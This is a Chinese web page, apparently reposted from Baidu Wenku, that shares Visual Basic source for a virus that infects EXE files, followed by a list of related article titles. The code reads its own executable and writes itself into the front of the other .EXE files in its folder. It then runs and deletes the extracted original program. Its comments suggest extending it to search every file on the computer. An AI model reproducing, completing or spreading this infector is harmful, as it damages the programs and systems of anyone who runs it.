用vb做的可感染exe文件的一段代码分享一下

来源:百度文库 编辑:神马文学网 时间:2024/06/03 16:05:36
Option Explicit
Private Victim As String '要感染的文件的名字
Private HostLen As Long '要感染的文件的大小
Private vbArray() As Byte '病毒的代码
Private hArray() As Byte '要感染的文件的代码
Private lenght As Long
Private MySize As Integer '病毒的大小

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Sub form_Initialize()
Dim i As Long
On Error GoTo vbVerror '出错处理

'原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
MySize = LOF(1)
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1
'这是在读自己的代码


Victim = Dir(App.Path & "\" & "*.EXE") '随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)
While Victim <> ""

If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1
'读出病毒自身的代码


If hArray(&H69) <> &H4D Then

i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If '要保证被感染的不是空文件(不是圈套)
End If
End If
'读出准备被感染的文件的代码

Victim = Dir() 'Next

Wend

'下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1

Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
Put #1, , vbArray
Close #1

MsgBox "pause"
idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".eve"

Else
Close #1

End If

End

vbVerror: '出错处理,空着就可以了
MsgBox "出错了"

End Sub


Private Sub Form_Load()
MsgBox "本人运行了"
End Sub
用vb做的可感染exe文件的一段代码分享一下 VB.NET的文件可编译为纯EXE文件? 关于vb.net生成exe文件的问题!! 一些vb和c java 的代码收藏分享 2005-08-26-分享一段Tag的代码 - 13121982‘Article 奇怪的wwwwwww.exe文件 一段天气预报的代码 - 我发现一段很有意思的文文,呵呵分享一下 windows下的EXE文件大揭密 windows下的EXE文件大揭密 360SE.exe损坏文件的处理? 360SE.exe损坏文件的处理? VC6.0生成的exe文件图标 exe转vbs的vbs代码 分享一段命令,用于删除一个目录下存在超过指定时间的文件 分享一段代码show.asp?id=26变成show/?26的形式 图像二值化的VB代码1 VB.NET访问INI文件代码实现 用ads1.2的ARMulator计算一段代码运行时间 收藏的歌词 分享一下 将Java程序作成exe文件的几种方法 终于干掉了默认的输入法, 关于ctfmon.exe文件 EXE文件被病毒破坏后的修复方法 PHP中将swf转为exe文件的亲身体验